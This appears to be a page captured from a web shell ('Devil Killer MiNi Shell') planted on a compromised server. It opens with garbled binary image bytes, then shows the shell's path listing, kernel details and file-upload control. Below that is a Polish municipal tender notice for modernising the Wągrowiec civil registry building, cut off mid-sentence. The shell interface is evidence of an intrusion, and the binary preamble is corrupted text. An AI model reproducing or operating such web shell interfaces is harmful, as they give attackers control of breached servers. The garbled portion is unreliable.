JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250804/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250804/0035944901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja budynku Urzędu Stanu Cywilnego w Wągrowcu – Etap II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Wągrowiec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791282</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tadeusza Kościuszki 15a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wągrowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wagrowiec.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wagrowiec.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja budynku Urzędu Stanu Cywilnego w Wągrowcu – Etap II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-afb77159-9046-402c-ba3f-2b36da597ec4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00359449</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00029408/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Modernizacja budynku Urzędu Stanu Cywilnego w Wągrowcu – etap II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1148347 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/wagrowiec_eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy zakupowej, działającej pod adresem https://platformazakupowa.pl/pn/wagrowiec_eu.<br/>W zakresie pytań technicznych związanych z działaniem systemu prosi się o kontakt z Centrum Wsparcia Klienta https://platformazakupowa.pl pod numer (22)1010202, cwk@platformazakupowa.pl <br/>2.	Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. <br/>3.	W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy) odbywa się również za pośrednictwem Platformy zakupowej, działającej pod adresem https://platformazakupowa.pl/transakcja/1148347 <br/>4.	Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>5.	Zaleca się, aby przed rozpoczęciem składania oferty Wykonawca zalogował się do systemu, a jeżeli nie posiada konta, założył bezpłatne konto. W przeciwnym wypadku wykonawca będzie miał ograniczone funkcjonalności, np. brak widoku wiadomości prywatnych od Zamawiającego w systemie lub wycofania oferty bez kontaktu<br/>z Centrum Wsparcia Klienta.<br/>6.	Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem https://platformazakupowa.pl/transakcja/1148347 Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana za pośrednictwem https://platformazakupowa.pl/transakcja/1148347 do konkretnego wykonawcy.<br/>7.	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio<br/>na https://platformazakupowa.pl/transakcja/1148347 przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>8.	Zawiadomienia, oświadczenia, wnioski lub informacje składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki poprzez Platformę, dostępną pod adresem https://platformazakupowa.pl/transakcja/1148347 <br/>9.	Za datę przekazania oświadczeń, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich doręczenia<br/>za pośrednictwem formularza zamieszczonego na stronie https://platformazakupowa.pl/transakcja/1148347 <br/>w zakładce dedykowanej postępowaniu.<br/>10.	Na stronie Platformy znajduje się Instrukcja dla Wykonawców zawierająca: informacje ogólne, informacje dot. sposobu i formy złożenia oferty oraz sposobu komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert), Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące<br/>w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/><br/>Z uwagi na ograniczenie liczby znaków cd. treści w rozdziale &#34;Informacje dodatkowe&#34;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZ.271.11.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja zadania inwestycyjnego w formule zaprojektuj i wybuduj <br/>pn. „Modernizacja budynku Urzędu Stanu Cywilnego w Wągrowcu – Etap II”. <br/>Inwestycja w zakresie modernizacji budynku Urzędu Stanu Cywilnego w Wągrowcu obejmuje: - <br/>wykonanie kompletnej dokumentacji projektowej przez Wykonawcę zgodnie z Programem Funkcjonalno- <br/>Użytkowym oraz uzyskanie niezbędnych decyzji, opinii, badań, warunków technicznych, uzgodnień i pozwoleń <br/>uzgodnionych z konserwatorem zabytków dla modernizacji budynku Urzędu Stanu Cywilnego w Wągrowcu wraz <br/>z uzyskaniem pozwolenia na budowę, - <br/>wykonanie robót budowlanych na podstawie opracowanej dokumentacji projektowej wraz <br/>z przeprowadzeniem wszystkich niezbędnych odbiorów oraz uzyskaniem decyzji o pozwoleniu na użytkowanie. <br/>Na podstawie wytycznych określonych w Programie Funkcjonalno-Użytkowym, Wykonawca w ramach <br/>modernizacji budynku Urzędu Stanu Cywilnego w Wągrowcu, wykona: - remont poddasza z jego adaptacją na pomieszczenia biurowe, -remont klatki schodowej z dostosowaniem układu komunikacyjnego pod kątem osób z niepełnosprawnościami, - prace związane z modernizacją stropu nad parterem, - budowa szybu i podnośnika windowego, - remont i ocieplenie stropów oraz ścian poddasza, - remont stolarki zewnętrznej oraz kompleksowe wykonanie nowej stolarki wewnętrznej, - wyposażenie wnętrz, - wykonanie pomieszczenia serwerowni, - wykonanie nowych instalacji wewnętrznych według wytycznych zawartych w PFU. <br/>Dokumentacja projektowa powinna być sporządzona z zachowaniem wymagań określonych w Programie <br/>Funkcjonalno-Użytkowym oraz zgodnie z obowiązującymi normami, przepisami, standardami dotyczącymi <br/>bezpieczeństwa i komfortu użytkowania budynków. Należy dostosować obiekt do potrzeb osób <br/>z niepełnosprawnościami. Zapewniając zgodność z warunkami ochrony przeciwpożarowej oraz wymaganiami <br/>BHP i sanepidu. W ramach zadania wykonawca wykona dokumentację projektową - wraz z uzyskaniem <br/>wszystkich <br/>uzgodnień technicznych, dotyczącą wykonania podnośnika windowego dla osób <br/>z niepełnosprawnościami, wraz z jego budową/montażem. <br/>Dokumentacja projektowa zostanie wykonana zgodnie z obowiązującymi przepisami techniczno-budowlanymi, <br/>a w szczególności Rozporządzeniem Ministra Infrastruktury z 20.12.2021 r. w sprawie szczegółowego zakresu <br/>i <br/>formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz <br/>programem funkcjonalnym, zatwierdzonym przez Zamawiającego koncepcją architektoniczną oraz wymaganymi <br/>przez przepisy prawa normami. Projektant zapewni sprawdzenie dokumentacji projektowej pod względem <br/>poprawności opracowania, kompletności i zgodności z przepisami techniczno-budowlanymi oraz <br/>obowiązującymi Polskimi Normami, przez osoby posiadające uprawnienia budowlane bez ograniczeń w <br/>odpowiedniej specjalności. <br/>W trakcie prac projektowych Projektant jest zobowiązany uwzględnić w rozwiązaniach projektowych uwagi <br/>Zamawiającego i jego życzenia, o ile nie są sprzeczne z obowiązującymi przepisami i normami, sztuką budowlaną <br/>i programem funkcjonalno-użytkowym. <br/>Przed rozpoczęciem prac budowlanych należy uzyskać pozwolenie konserwatorskie i pozwolenie na budowę. <br/>Projekt wykonawczy musi być zgodny z obowiązującymi przepisami i wymaganiami (warunkami) technicznymi, <br/>normami wprowadzonymi do obowiązkowego stosowania. Budynek Urzędu Stanu Cywilnego w Wągrowcu jest <br/>zabytkiem wpisanym do Gminnej Ewidencji Zabytków (zarządzenie nr 134/2018 Burmistrza Miasta Wągrowca z <br/>dnia 8 października 2018 r. w sprawie przyjęcia Gminnej Ewidencji Zabytków dla Miasta Wągrowca). <br/> Wykonawca uzyska na swój koszt wszelkie wymagane zgodnie z przepisami prawa dokumenty, uzgodnienia, <br/>badania, opracowania, zgody, warunki, decyzje i pozwolenia niezbędne do: <br/>1) przygotowania opracowań przedprojektowych wskazanych w PFU, <br/>2) przygotowania prac projektowych (projektu budowlanego i wykonawczego), <br/>3) uzyskanie akceptacji projektu do realizacji od Zamawiającego, <br/>4) uzyskania pozwoleń, opinii, uzgodnień, decyzji niezbędnych do uzyskania prawomocnego pozwolenia <br/>na budowę, w tym pozwolenia konserwatorskiego, <br/>5) uzyskania pozwolenia na budowę lub zgłoszenia, <br/>6) rozpoczęcia i przeprowadzenia robót budowlanych, <br/>7) prowadzenia robót zgodnie z wydanym pozwoleniem na budowę oraz pozwoleniem konserwatora <br/>zabytków, zatwierdzonym projektem budowlanym, opiniami, pozwoleniami, decyzjami wcześniej <br/>uzyskanymi, uzyskania pozwolenia na użytkowanie / zgłoszenia zakończenia budowy – jeśli będzie <br/>wymagane. <br/>2) Planowane przedsięwzięcie – odbędzie się na dz. nr 1443/5 (na obszarze wpisu do rej. 436/Wlkp/A, <br/>na zabytku wpisanym do Gminnej Ewidencji Zabytków dla Miasta Wągrowca). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44510000-8 - Narzędzia</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniają określone przez Zamawiającego warunki <br/>udziału w postępowaniu dotyczące: <br/>zdolności technicznej lub zawodowej <br/>1) Zamawiający wymaga wykazania przez wykonawcę, że wykonał nie wcześniej niż w okresie ostatnich 5 lat <br/>(liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności <br/>jest krótszy – w tym okresie: wykonał przynajmniej dwie roboty budowlane polegające na budowie/ <br/>przebudowie/rozbudowie obiektu użyteczności publicznej w rozumieniu rozporządzenia Ministra <br/>Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać <br/>budynki i ich usytuowanie - § 3 pkt. 6, o minimalnej kubaturze 400 m3 każdy. <br/>2) Zamawiający wymaga, aby wykonawca dysponował osobami, które skieruje do realizacji zamówienia tj.: <br/>a) <br/>projektantem, który: <br/>• posiada od minimum 5 lat (licząc od dnia uzyskania uprawnień do dnia składania oferty) aktualne <br/>uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności <br/>konstrukcyjno-budowlanej lub równoważnych (do projektowania lub do projektowania i kierowania <br/>robotami) <br/>• posiada wpis na listę członków właściwej izby samorządu zawodowego.<br/>b) <br/>kierownikiem budowy, który: <br/>• posiada aktualne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie <br/>w specjalności konstrukcyjno-budowlanej bez ograniczeń (do kierowania robotami) lub <br/>równoważnych oraz wpis na listę członków właściwej izby samorządu zawodowego (posiada <br/>powyższe uprawnienia minimum 6 lat - licząc od dnia uzyskania uprawnień) <br/>c) kierownikiem robót branży elektrycznej, który: <br/>• posiada aktualne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w <br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych <br/>bez ograniczeń (do kierowania robotami) lub równoważnych oraz wpis na listę członków właściwej <br/>izby samorządu zawodowego <br/>• posiada powyższe uprawnienia minimum 3 lata - licząc od dnia uzyskania uprawnień <br/>a) kierownikiem robót branży instalacyjnej, który: <br/>• posiada aktualne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w <br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, <br/>wodociągowych i kanalizacyjnych bez ograniczeń (do kierowania robotami) lub równoważnych oraz <br/>wpis na listę członków właściwej izby samorządu zawodowego <br/>• posiada powyższe uprawnienia minimum 3 lata - licząc od dnia uzyskania uprawnień <br/>Osoba wskazana w wykazie osób będzie pełniła funkcję kierownika budowy/robót, projektanta w trakcie <br/>realizacji zadania będącego przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego. <br/>W przypadku gdy Wykonawca będzie zmuszony do zmiany kierownika budowy/robót, projektanta musi zapewnić <br/>udział osoby, o wiedzy i doświadczeniu odpowiadającym warunkom określonym w niniejszym SWZ. <br/>Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im <br/>uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji <br/>Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. – Prawo budowlane <br/>(tj. Dz. U. z 2025 r., poz. 418). <br/>Zamawiający dopuszcza możliwość posiadania przez jedną osobę więcej niż jednego z uprawnień, o których <br/>mowa powyżej. <br/>2. Wykonawcy występujący wspólnie, łącznie muszą spełnić warunki udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający będzie żądał na potwierdzenie niepodlegania wykluczeniu: <br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy <br/>kapitałowej <br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji <br/>i konsumentów (t.j. Dz.U. z 2023r., poz. 1689 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, <br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie <br/>od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ, <br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż <br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający będzie żądał na potwierdzenie spełniania warunków udziału w postępowaniu: <br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca <br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów <br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, <br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały <br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – załącznik nr 6 do SWZ. <br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami <br/>na temat ich kwalifikacji zawodowych, 